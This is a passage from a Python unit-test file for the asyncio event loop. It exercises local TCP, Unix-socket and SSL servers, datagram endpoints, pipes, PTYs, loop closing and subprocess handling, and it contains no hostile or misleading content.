mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@support.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client,peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertEqual(sock.fileno(), sock_ob.fileno())
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2)
await asyncio.sleep(1e-4)
await asyncio.sleep(1e-6)
await asyncio.sleep(1e-8)
await asyncio.sleep(1e-10)
self.loop.run_until_complete(wait())
# The ideal number of call is 12, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
async def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
async def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
